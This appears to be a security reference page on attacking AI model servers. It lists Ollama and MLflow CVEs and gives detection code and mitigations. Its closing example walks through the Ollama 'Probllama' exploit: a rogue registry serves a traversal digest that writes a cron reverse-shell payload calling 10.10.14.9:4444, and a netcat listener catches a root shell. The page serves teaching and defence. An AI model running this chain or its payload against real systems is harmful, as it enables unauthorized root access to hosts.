INF-001: Model Server Exploitation
| Category | Infrastructure |
| Frameworks | ATLAS: ML Supply Chain · OWASP: LLM05 |
Exploit vulnerabilities in model serving infrastructure. Ollama, vLLM, TGI, and MLflow have had critical CVEs enabling path traversal, code execution, and data theft.
Technique
# Notable model server CVEs:
CVE-2024-37032 (Ollama "Probllama")
- Unvalidated layer digest in a manifest fetched from an attacker-controlled registry -> path traversal -> arbitrary file write
CVE-2024-45436 (Ollama zip traversal)
- ZIP extraction during model import -> file write outside the target directory
CVE-2023-2780 (MLflow)
- Source validation bypass (bypass of the CVE-2023-1177 fix) -> arbitrary file read
# Attack pattern:
1. Enumerate model server (version, API)
2. Check for known CVEs
3. Chain file write with code execution
4. Pivot to host or container escape
Key Concepts
- Model servers are high-value targets with large attack surfaces. They typically run with elevated privileges (GPU access, filesystem access for model storage, network access for API serving) and process untrusted input in the form of model files, API requests, and configuration data.
- Path traversal vulnerabilities are endemic to model serving. Model import, digest handling, and snapshot operations all involve file system paths derived from user-controlled input. Ollama's Probllama (CVE-2024-37032) demonstrated how digest values can be weaponized for arbitrary file writes through path traversal.
- The attack chain typically escalates from file write to code execution. An arbitrary file write primitive can overwrite cron jobs, SSH authorized keys, systemd services, or application code to achieve remote code execution. In containerized deployments, this becomes the first step toward container escape.
- Many model servers ship with no authentication. Ollama binds to localhost by default but is routinely exposed with OLLAMA_HOST=0.0.0.0 (the usual setting in Docker deployments) and has no built-in authentication; vLLM's OpenAI-compatible server only checks a bearer token when it is started with --api-key. In production deployments these defaults are frequently left unchanged.
- Supply chain attacks through model registries compound the risk. A compromised model file downloaded from a public registry can exploit deserialization vulnerabilities on load, giving the attacker code execution before any inference request is made.
Detection
- Monitor model server API endpoints for anomalous requests. Path traversal attempts (sequences like ../, URL-encoded and double-encoded variants, backslash forms, or overly long paths) in model pull, push, create, or blob operations are strong indicators of exploitation. Request-side monitoring has a limit, though: in the Probllama case the traversal string never appears in the client's request, only in the manifest that Ollama fetches from the attacker's registry, so also flag pulls whose model name points at a registry outside an allow-list or that set "insecure": true.
- Track file system changes outside expected model storage directories. Model servers should only write to designated model storage paths. File creation or modification outside these directories, especially in system directories such as /etc, signals a successful path traversal attack.
- Alert on model server version and known CVE correlation. Maintain a mapping of deployed model server versions to known vulnerabilities and generate alerts when vulnerable versions are detected in the environment.
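Detection logic for the three points above, as an added example written for this page rather than taken from Ollama or any vendor. It flags traversal (including double-encoded and backslash variants) in request URLs and bodies, flags pulls that name a registry outside an allow-list or set insecure, checks whether a file write landed outside the model store, and maps a product version to the CVEs already listed on this page. The request-log entry format, the allow-list, the store path and the sample entries are constructed assumptions.

```python
import os
import re
from urllib.parse import unquote

ALLOWED_REGISTRIES = {"registry.ollama.ai"}   # assumed allow-list
MODEL_STORE = "/root/.ollama/models"          # assumed model store root

# '..' as its own path component; matched after decoding and after folding
# backslashes to '/'.
TRAVERSAL_RE = re.compile(r"(?<![A-Za-z0-9_.])\.\.(?:/|$)")


def decode_fully(s: str, rounds: int = 3) -> str:
    """Peel up to three layers of URL encoding (%252e%252e -> %2e%2e -> ..)."""
    for _ in range(rounds):
        d = unquote(s)
        if d == s:
            break
        s = d
    return s


def has_traversal(value: str) -> bool:
    return bool(TRAVERSAL_RE.search(decode_fully(value).replace("\\", "/")))


def registry_of(model_name: str) -> str:
    """'10.10.14.9:5000/evil' -> '10.10.14.9:5000'; 'llama3:8b' -> default."""
    if "/" in model_name:
        first = model_name.split("/", 1)[0]
        if "." in first or ":" in first or first == "localhost":
            return first
    return "registry.ollama.ai"


def inspect_request(entry: dict) -> list:
    """Indicator tags for one request-log entry (constructed format below)."""
    hits = []
    path = entry.get("path", "")
    if has_traversal(path):
        hits.append("traversal-in-url")
    body = entry.get("body") or {}
    for key, value in body.items():
        if isinstance(value, str) and has_traversal(value):
            hits.append(f"traversal-in-body:{key}")
    if path in ("/api/pull", "/api/push"):
        reg = registry_of(body.get("name", ""))
        if reg not in ALLOWED_REGISTRIES:
            hits.append(f"unapproved-registry:{reg}")
        if body.get("insecure"):
            hits.append("insecure-pull")
    return hits


def write_outside_store(path: str, store: str = MODEL_STORE) -> bool:
    """True when a file write (e.g. an auditd record) lands outside the store."""
    if not os.path.isabs(path):
        return True   # relative paths are unexpected here; treat as suspicious
    store = os.path.normpath(store)
    return os.path.commonpath([store, os.path.normpath(path)]) != store


# First fixed version for the CVEs named on this page.
FIXED_IN = {
    ("ollama", "CVE-2024-37032"): (0, 1, 34),
    ("ollama", "CVE-2024-45436"): (0, 1, 47),
    ("mlflow", "CVE-2023-2780"): (2, 3, 1),
}


def parse_version(v: str) -> tuple:
    return tuple(int(x) for x in re.findall(r"\d+", v)[:3])


def vulnerable_cves(product: str, version: str) -> list:
    pv = parse_version(version)
    return sorted(cve for (p, cve), fixed in FIXED_IN.items()
                  if p == product and pv < fixed)


# Constructed request-log entries (not real Ollama logs).
SAMPLE_LOG = [
    {"client": "10.0.0.5", "path": "/api/pull",
     "body": {"name": "llama3:8b"}},
    {"client": "10.10.14.9", "path": "/api/pull",
     "body": {"name": "10.10.14.9:5000/evil", "insecure": True}},
    {"client": "10.10.14.9",
     "path": "/api/blobs/%252e%252e%252f%252e%252e%252fetc%252fpasswd",
     "body": None},
    {"client": "10.10.14.9", "path": "/api/create",
     "body": {"name": "evil", "modelfile": "FROM ../../../../etc/passwd"}},
]


def scan_log(entries=SAMPLE_LOG) -> list:
    """(client, path, indicators) for every entry with at least one indicator."""
    out = []
    for e in entries:
        hits = inspect_request(e)
        if hits:
            out.append((e["client"], e["path"], hits))
    return out


if __name__ == "__main__":
    for row in scan_log():
        print(row)
    print("ollama 0.1.29 ->", vulnerable_cves("ollama", "0.1.29"))
    print("write to /etc/cron.d flagged:", write_outside_store("/etc/cron.d/revshell"))
```

The rogue-registry pull in the sample log is caught only by the registry allow-list and the insecure flag, not by the traversal pattern, which is the point made above: for Probllama the file-system check is the indicator that confirms exploitation, while the request check only tells you that a pull went somewhere it should not have.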
Mitigation
- Keep model servers updated and track AI-specific CVEs. The AI infrastructure vulnerability landscape is evolving rapidly. Subscribe to security advisories for Ollama, vLLM, TGI, MLflow, and other deployed model servers.
- Never expose model servers directly to untrusted networks. Place model servers behind an API gateway with authentication, rate limiting, and input validation. The model server should be reachable only from trusted internal services.
- Run model servers in sandboxed environments (containers with minimal privileges, read-only filesystems where possible, no host network access) to limit the impact of successful exploitation. Apply the principle of least privilege to GPU and filesystem access.
Example Output
The following demonstrates CVE-2024-37032 (Ollama "Probllama") exploitation against a vulnerable Ollama instance. The flaw is a path traversal in how Ollama handles the layer digest of a manifest fetched during a model pull: the digest is used as a file name under the blob directory without validation, so a manifest served by an attacker-controlled registry yields an arbitrary file write on the host.
Authorized testing only. This technique should only be used during sanctioned engagements with explicit written authorization. CVE-2024-37032 was reported by Wiz and patched in Ollama v0.1.34.
Step 1: Enumerate Ollama Version
$ curl -s http://10.10.14.50:11434/api/version
{
"version": "0.1.29"
}
Version 0.1.29 is vulnerable to CVE-2024-37032. Versions prior to 0.1.34 do not validate the digest values in a pulled manifest before using them to build file paths, allowing path traversal.
Step 2: Create a Malicious Manifest
First, set up a rogue registry server that serves a manifest whose layer digest is a traversal string. Ollama joins the digest onto <models>/blobs to decide where the blob content is written, so the traversal has to climb far enough from that directory: with the model store at /root/.ollama/models (as the shell output later in this walkthrough shows), four ../ reach the filesystem root, and a longer chain is harmless because surplus ../ at / are discarded. The cron entry must end with a newline or cron ignores it.
# Start a minimal rogue registry on the attacker box
$ python3 rogue_registry.py --listen 10.10.14.9:5000 \
--digest '../../../../etc/cron.d/revshell' \
--payload '* * * * * root bash -c "bash -i >& /dev/tcp/10.10.14.9/4444 0>&1"'
[*] Rogue registry listening on 10.10.14.9:5000
[*] Serving manifest with digest: ../../../../etc/cron.d/revshell
[*] Payload size: 74 bytes
Step 3: Trigger the Pull from the Rogue Registry
The digest is supplied without the sha256: prefix. Ollama replaces : with - before joining the path, so a prefixed value would turn the first component into the literal directory name sha256-.., which no longer steps up a level; the raw traversal string avoids that.
$ curl -s -X POST http://10.10.14.50:11434/api/pull \
-d '{"name": "10.10.14.9:5000/evil", "insecure": true}'
{"status":"pulling manifest"}
{"status":"pulling ../../../../etc/cron.d/revshell","digest":"../../../../etc/cron.d/revshell","total":74,"completed":74}
{"status":"verifying sha256 digest"}
{"status":"writing manifest"}
{"status":"success"}
Ollama followed the traversal path and wrote the payload content to /etc/cron.d/revshell on the target host. The write primitive still needs something to consume the file: the cron.d route assumes a cron daemon on the target, which a bare container image such as the official Ollama Docker image does not run. The published Wiz proof of concept instead wrote /etc/ld.so.preload together with a malicious shared library and had it loaded by a subsequent API request.
Step 4: Catch the Reverse Shell
$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.9] from (UNKNOWN) [10.10.14.50] 48216
bash: cannot set terminal type, not a terminal
root@ollama-prod:/# id
uid=0(root) gid=0(root) groups=0(root)
root@ollama-prod:/# cat /etc/hostname
ollama-prod
root@ollama-prod:/# ls /root/.ollama/models/manifests/
registry.ollama.ai
Step 5: Verify the Written File
root@ollama-prod:/# cat /etc/cron.d/revshell
* * * * * root bash -c "bash -i >& /dev/tcp/10.10.14.9/4444 0>&1"
root@ollama-prod:/# ls -la /etc/cron.d/revshell
-rw-r--r-- 1 root root 74 Sep 14 03:22 /etc/cron.d/revshell
The entire chain, from unauthenticated API access to root shell, needs only one request to the target (the POST to /api/pull); Ollama itself fetches the manifest and the blob from the rogue registry. The fix in Ollama v0.1.34 rejects any digest that is not a well-formed sha256 value before it is used to build a path.